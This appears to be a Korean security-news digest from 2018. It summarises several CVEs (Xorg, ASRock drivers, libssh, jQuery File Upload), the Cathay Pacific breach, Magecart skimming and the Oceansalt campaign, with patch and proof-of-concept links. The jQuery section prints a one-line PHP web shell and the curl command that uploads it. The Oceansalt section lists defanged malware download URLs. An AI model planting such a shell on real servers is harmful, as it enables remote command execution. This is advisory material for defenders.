해외 보안 트렌드

*Xorg X server: 하드웨어와 OS 플랫폼 등 광범위하게 그래픽 환경을 제공하는 X11(디스플레이 서버)시스템제공 오픈소스

그래픽 디스플레이 관리를 위해 클라이언트와 유저 어플리케이션 사이에 중개자 역할을 함 

<발견자>

인도 보안 연구원 Narendra Shinde가 OpenBSD와 거의 대부분의 리눅스 배포판에 영향을 미치는 X.Org Server 취약점을 발견

<취약점>

권한이 낮은 사용자가 악성코드를 실행하고 루트계정 사용자 파일을 포함한 모든 파일을 덮어쓰기 할 수 있음.

<영향성>

modulepath: Xorg 서버 모듈 서치를 위한 디렉토리 패스 설정

logfile: Xorg서버에 디폴트 로그파일(/var/log/Xorg.n.log)을 사용하는 대신 사용할 새로운 로그 파일 설정

Xorg 서버가 상승된 권한으로 실행될 시, -modulepath는 X서버에 로드 될 모듈에 대해 안전하지 않은 경로를 지정하는데 사용돼 프로세스에 권한 없는 코드를 실행 할 수 있게 함.

서버를 시작할 때 -modulepath와 -logfile의 권한이 없는 사용자가 물리적인 콘솔을 통해 시스템에 로그인 할 수 있도록 권한 상승을 가능하게 하며 루트 권한으로 임의의 코드를 실행할 수 있게 함.

<영향받는 제품>

xorg-x11-server before 1.20.3 이전 버전

데비안, 우분트, CentOS, 레드헷, 페도라, OpenBSD, SUSE/openSUSE 배포판 해당됨 

<관련 CVE코드>

CVE-2018-14665

CVSS 3.0 Score : 

Red Hat Customer Portal CVSS3 Base Score : 6.6  

SusSE CVSS v3 Base Score: 8.4 

PoC: 

https://twitter.com/hackerfantastic/status/1055517801224396800

https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh

https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html

https://github.com/jas502n/CVE-2018-14665

https://gitlab.freedesktop.org/xorg/xserver/commit/8a59e3b7dbb30532a7c3769c555e00d7c4301170

<대응방안>

패치 : X.Org Server version 1.20.3 패치완료

데비안, 우분트, Cen0S, 레드헷, 페도라, OpenBSD는 취약점에 따른 보안 권고를 발표

데비안 : https://security-tracker.debian.org/tracker/CVE-2018-14665

우분트 : https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-14665.html

레드헷 : https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-14665

SUSE/openSUSE : https://www.suse.com/security/cve/CVE-2018-14665.html 

OpenBSD : https://ftp.openbsd.org/pub/OpenBSD/patches/6.4/common/001_xserver.patch.sig

출처: https://thehackernews.com/2018/10/privilege-escalation-linux.html

<사건경위>

피해규모 : 940만명 개인정보 유출. 유출정보는 개개인마다 다양함.

유출시점 : 지난 3월에 비인가자가 시스템에 접근한 것을 최초 발견, 5월에 고객 정보 유출을 확인

유출항목 : 여권상 이름, 국적, 생년월일, 휴대전화번호, 이메일 주소, 집주소, 여권번호, 신분증 번호, 항공사 멤버십 번호, 고객센터 메모, 여행 기록 정보, 86만명의 여권 번호, 24만5천명의 홍콩 신분증 번호, 403건의 만료된 신용카드 번호, 27개의 인증번호가 없는 신용카드 번호 유출

캐세이퍼시픽 측 입장 : 비밀번호는 유출되지 않았고 유출된 개인정보가 악용된 바가 없다고 밝힘

데이터 유출이 일어난 시스템은 비행 조정 시스템과 다른 것으로 비행 안전에는 어떠한 영향도 끼치지 않는다고 주장

데이터 유출의 피해자는 캐세이퍼시픽이 개별 연락을 취했으며, 정보 유출의 피해자라고 의심하는 사람은 infosecurity@cathaypacific.com 연락하길 권고

데이터 유출 사건과 관련한 조치사항 등은 www.infosecurity.cathaypacific.com 에서 확인 가능

<논란>

유출 건에 대해 통보를 하기 전 정확한 사건 경위를 파악하고 '불필요한 공포조장'을 막기 위해서 언론에 알리지 않았다고 하나, 

사건을 늦게 알리면서 피해자들은 약 5개월간 대처할 시간을 놓쳤다는 비난을 받고 있음. 유럽의 GDPR에 따르면 유출 사고가 있을 시 72시간안에 고지해야 함.

지난 9월있었던 British Airline은 데이터 유출 피해고객에게 금전적 보상을 약속했지만, 캐세이퍼시픽은 경제적 보상에 대한 아무런 말이 없는 것도 논란의 여지.

<영향성>

경영난: 데이터유출 사고가 기사화 되며 주가는 9년만의 6%이상 하락. 유출 이전에도 중국의 저가 항공사, 중동 항공사와의 경쟁으로 인해 매출의 저조한 상태로 지난 3월에는 연례 적자를 기록 경영진의 1/4을 포함해 600명의 인원 감축을 예고함

출처 : https://www.darkreading.com/vulnerabilities---threats/cathay-pacific-suffers-largest-airline-breach/d/d-id/1333128 

        https://www.securityweek.com/questions-mount-over-delay-after-cathay-pacific-admits-huge-data-leak

<회사정보>

세계에서 3번째로 큰 마더보더 회사로 본사는 대만 타이페이에 위치.

<발견회사>

SecureAuth

<취약점>

ASRock RGBLED, A-Tuning, F-Stream, RestartToUEFI 취약점 존재로 공격자가 시스템 권한 상승 가능.

(CVE-2018-10709, CVE-2018-10710, CVE-2018-10711, CVE-2018-10712)

<취약대상>

ASRock RGBLED과 다른 ASRock 브랜드 유틸리티가 설치된 AsrDrv101.sys, AsrDrv102.sys low-level 드라이버 

<관련 CVE코드>

CVE-2018-10709 : 컨트롤 레지스터(CR) 값을 읽고 쓸 수 있으며 상승된 권한을 이용해 코드 실행가능

CVE-2018-10710 : 입력 출력 컨트롤 코드와 관련되며 임의의 메모리를 읽고 쓸 수 있어 권한 상승을 유발함 

CVE-2018-10711 : Machine Specific Register(MSRs)를 읽고 쓸 수 있어 공격자가 임의의 ring-0 code를 실행시킬 수 있음

CVE-2018-10712 : IO 포트로부터 데이터를 읽거나 쓰기가 가능해 공격자가 상승된 권한으로 코드를 실행가능

PoC : https://www.secureauth.com/labs/advisories/asrock-drivers-elevation-privilege-vulnerabilities

<대응방안>

패치 : 취약 어플리케이션에 대한 패치를 이미 배포함

ASRock RGBLED v1.0.36, A-Tuning v3.0.216, F-Stream v3.0.216, and RestartToUEFI v1.0.7

출처 : https://www.securityweek.com/multiple-vulnerabilities-patched-asrock-drivers

<Magecart 해킹그룹>

보안이 취약한 결제사이트에서 XSS방법을 이용 신용카드 정보를 해킹하는 전문 해커집단.

지난 9월 British Airline,Ticketmaster(공연예매 사이트), Newegg(컴퓨터하드웨어,소프트웨어 온라인몰), Feedify(클라우드 서비스 제공),

Shopper Approved(온라인스토어의 리뷰검색 소프트웨어)공격을 주도한 것으로 알려짐(공격에 사용된 코드가 매우 유사함)

<공격방법>

Magecart멀웨어와 함께 자바스크립트 코드를 고객 후기 작성란에 삽입함. 

코드는 목표 사이트에 맞게 커스터마이징을 하여 특정 페이지에만 삽입하여 효율성을 높임. 

이 22라인의 코드는 결제자가 '결제하기' 버튼을 누르면 결제자의 정보를 저장해 공격자 서버로 전송함.

공격자들은 공격을 위장하기 위해 유로 서버 SSL 인증서를 사용하기도 함.

<공격대상>

공격대상을 대형 웹사이트에서 유명한 온라인몰 익스텐션 소프트웨어의 취약점 공격으로 전환.

PHP의 unserialize() 함수를 이용해 DB혹은 자바스크립트 파일을 조작하는 공격을 하는 것으로 추정.

위의 공격이 성공할 시 공격 웹사이트에 커스터마이징한 자바스크립트 결제섹션을 삽입함.

사용자가 신용카드 정보를 입력하고 '제출' 버튼을 누르는 즉시 가짜 결제폼은 사라짐.

코드는 2단계 결제 추출 방법을 사용한 것으로 밝혀짐.

*마젠토는 PHP기반 오픈소스 e커머스 플랫폼 (https://magento.com)

현재 많은 수의 확장프로그램을 존재하며, 다수의 PHP Object Injection(POI)취약점(약23개)을 발견한 것으로 보임.

(취약점 패치는 확장프로그램 개인 개발자의 역량이 달려있으며, 사용자는 확장프로그램의 취약여부를 인지하지 못한 상태)

최근 있었던 Windows Task Scheduler 제로데이트와 유사하며 동일인 SandboxEscaper가 발견.

Microsoft Data Sharing libary dssvc.dll에 영향을 끼치나 공격을 위해서는 공격대상에 대한 접근이 가능해야 함 

Admin이 아닌 자가 랜덤 파일을 삭제 가능

(->어플리케이션의 dll파일 이나 시스템 서비스에 사용되는 파일(c:\windows\temp)등을 삭제 후 하이제킹이 가능)

취약대상: 최신 Windows 10(패치 완전히 된), Windows Server 2016,Windows Server 2019

공격난이도: 어려움

PoC: https://github.com/SandboxEscaper/randomrepo/blob/master/PoCLPE.rar

패치: 0patch 라는 3rd party 회사에서 발표(https://twitter.com/0patch/status/1055091501498318849)

출처 : https://www.securityweek.com/exploit-new-windows-zero-day-published-twitter

        https://threatpost.com/windows-deletebug-zero-day-allows-privilege-escalation-destruction/138550/

<Cisco 취약 '가능' 모델> (현재 조사중이며 의심리스트에 해당하지 않으면 취약하지 않은것으로 판단)

출처: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181019-libssh

Collaboration and Social Media

•Cisco Webex Meetings Server

Network Application, Service, and Acceleration

•Cisco Cloud Services Platform 2100

Network and Content Security Devices

•Cisco Content Security Management Appliance (SMA)

•Cisco Email Security Appliance (ESA)

•Cisco Identity Services Engine (ISE)

•Cisco Web Security Appliance (WSA)

Network Management and Provisioning

•Cisco Enterprise Service Automation

•Cisco NetFlow Generation Appliance

•Cisco Network Analysis Module

•Cisco Prime Network Registrar Virtual Appliance

•Cisco WAN Automation Engine (WAE)

Routing and Switching - Enterprise and Service Provider

•Cisco Application Policy Infrastructure Controller (APIC)

Voice and Unified Communications Devices

•Cisco IP Interoperability and Collaboration System (IPICS)

•Cisco Management Heartbeat Server

Video, Streaming, TelePresence, and Transcoding Devices

•Cisco Cloud Object Storage

•Cisco DCM Series D990x Digital Content Manager

•Cisco Video Surveillance 4300E and 4500E High-Definition IP Cameras

Wireless

•Cisco Wireless LAN Controller

Cisco Cloud Hosted Services

•Cisco Smart Software Manager Satellite

•Cisco Virtual HetNet

<F5 Network 취약제품> 패치無

출처: https://support.f5.com/csp/article/K52868493

•BIG-IP(D 747104) (AFM) 14.0.0  

•BIG-IP(D 747104) (AFM) 13.0.0 - 13.1.1

•BIG-IP(D 747104) (AFM) 12.1.0 - 12.1.3

<Debian 취약버전> 패치有 

출처: https://www.debian.org/security/2018/dsa-4322

•0.7.3-2+deb9u1 

<Ubuntu 취약버전> 패치有

출처: https://usn.ubuntu.com/3795-1/

•Ubuntu 18.04 LTS

•Ubuntu 16.04 LTS

•Ubuntu 14.04 LTS

•위 버전의 파생버전

<Suse 취약버전> 패치有

https://www.suse.com/security/cve/CVE-2018-10933/

•Linux Enterprise 12

•Linux Enterprise 15

<관련 CVE코드>

CVE-2018-1033

PoC : https://github.com/hackerhouse-opensource/cve-2018-10933

<대응방안>

Tenable, libssh 취약여부 진단 Nessus 플러그인 배포

출처: https://www.tenable.com/blog/libssh-vulnerable-to-authentication-bypass-cve-2018-10933

플러그인 리스트: https://www.tenable.com/plugins/search?q=cves%3A(%22CVE-2018-10933%22)&sort=&page=1

jQuery File Upload Plugin Vulnerability (CVE-2018-9206)

발견자 : 아카마이 Larry Cashdollar가 발견함.

*jQuery file upload:jQuery 위젯으로 다수 파일 선택, 드래그&드랍 지원, 진행바, 이미지/오디오/비디오 파일 검증 도구 함유

<영향받는 제품>

기본 HTML 형식의 파일 업로드 형태를 지원하는 모든 서버 플랫폼이 해당함 - PHP, Python, Ruby on Rails, Java, Node.js, GO. 2010년도 등의 오래된 버전도 해당됨.

해당 플러그인이나 플러그인을 토대로 만들어진 코드들은 이 취약점을 가지고 있으며, 취약점을 이용한 공격방법은 유투브에서 쉽게 찾아 볼 수 있음. 단독으로 사용되는 웹 어플리케이션부터 워드프레스 플러그인 등 다른 컨텐츠 관리 시스템들이 모두 해당됨.

<취약원인>

성능항샹과(아파치가 디렉토르에 접근할때마다 .htaccess 파일을 체크하지 않아되기 때문) 서버에 셋팅된 보안 설정을 사용자가 오버라이드 하지 못하도록 2.3.9. 버전부터 .htaccess를 사용불가능하게 한 것이 주된 원인. jQuery File Upload PHP는 보안을 .htaccess 파일에 의존함.이 취약점은 플러그인이 파일 업로드를 컨텐츠 유형 이미지로만 업로드를 허용하면서 발생함. 

<재현>

server/php 폴더: upload.php, UploadHandler.php: 파일 업로드 코드가 있음

파일은 서버 루트 패스의 files/ 폴더에 저장되고 이를 공격자가 웹 쉘을 업로드하여 서버에 명령어들을 실행할 수 있음

1) 명령어 실행 

$ curl -F ""files=@shell.php"" http://example.com/jQuery-File-Upload-9.22.0/server/php/index.php

Where shell.php is:

<?php $cmd=$_GET['cmd']; system($cmd);?>

2) cmd=id 테스트 웹 서버에 연결된 브라우저는 웹서버가 실행중은 프로세서 id 값을 리턴함.

- 영향성: 파일업로드와 코드실행 취약점 및 데이터 유출, 악성코드 감염, 변조 등 다양한 공격에 취약하게 만듦. 

취약한 플러그인을 포킹해서 사용하는 프로젝트들 중 얼마나 많은 수의 프로젝트들이 안전하게 유지,관리되고 있는지 알 수 없고, 이 플러그인을 포킹한 프로젝트들이 어떤 것들인지 알 길이 없음.

<관련 CVE코드>

CVE-2018-9206

PoC : https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206

출처: https://blogs.akamai.com/sitr/2018/10/having-the-security-rug-pulled-out-from-under-you.html

  https://www.securityweek.com/0-day-jquery-plugin-impacts-thousands-applications

한국 노린 사이버 정찰 캠페인, 오션설트 발견

https://www.boannews.com/media/view.asp?idx=73817&page=1&kind=1

[1단계: 한국 대학 대상]

5월 18일경. 한국 이름, 주소, 이메이 주소 등의 재학생 혹은 다수의 교육기관 졸업생의 신상 정보 리스트가 있는 엑셀파일.

이 엑섹파일을 열면 Oceansalt 임플란트가 설치됨. 코드는 www.[redacted].kr/admin/data/member/1/log.php 에서 다운받아 V3UI.exe 파일로 실행하도록 함.

이용파일형식: MS Word, Excel file

[2단계: 한국 주요 공공시설 대상] 

이러한 임플란트가 한국의 공식 웹사이트에서 호스팅 되어있는 것을 발견함: 음악 교사 단체 웹사이트

웹페이지는 악성 VBA 스크립트(문서를 다운받거나, 열시 Visaul Basic macros로 통신, 다운로드, 설치가 가능함) 내재된 2개의 엑셀파일을 다운받게 만드는 PHP 페이지를 호스팅함. 

1단계 공격당시 맥아피에 신고된 악용URL:

hxxp://www.[redacted].kr/admin/data/member/1/log.php

이용파일형식: MS Word, Excel file

파일 생성일: 5월31 / 5월30일 컴파일 된 후 배포됨 

생성자 이름: Lion

파일 내용: 한국 공공기관 프로젝트와 지출에 관한 문서

공격 대상: 정부차원이 아닌 한국'인' 대상

[3단계: 남북한 협동]

엑셀파일에 있던 매크로와 똑같은 타입이 내재된 MS워드 문서

이 외에 MS워드 문서와 연관된것 처럼 보이는 연락처와 전화번호를 포함한 엑셀 파일도 함께 사용

이용파일형식: MS Word, Excel file

MS워드파일

문서 내용: 남북 협력 기금 재정 관련된 가짜 문서 외에 MS워드 문서와 연관된것 처럼 보이는 연락처와 전화번호를 포함한 엑셀 파일

파일 생성일: 2단계 공격이 일어난 때

생성자 이름: Lion

악용 사이트: 위의 음악교사 단체 웹사이트 이외의 다른 웹사이트를 이용해 악성코드를 유포

악용 URL: hxxp://[redacted].kr/gbbs/bbs/admin/log/php

[4단계: 공격대상을 한국 외로 확대 - 미국, 캐나다 대상]

악성 문건은 아직 파악하지 못함. 1단계와 2단계 공격이 다른 서버를 통한 공격이었으므로 4단계도 또 다른 서버를 이용해 공격한 것으로 추측 함.

공격 대상

미국: 금융, 보건, 산업, 농업, 정부 등을 대상 

캐나다: 통신산업 대상

[5단계: 한국과 미국]

Oceansalt는 다수의 샘플을 이용해 공격함

맥아피는 다른 컨트롤 서버를 이용한 변종들을 추가적으로 발견

변종들은 최 Oceansalt의 임플란트와 동일함

파일컴파일: 6월13일~17일

한국과 미국 단체로부터 신고 접수 받음

기술 분석: 맥아피 보고서 p12 참고 

맥아피 보고서 원문 : https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf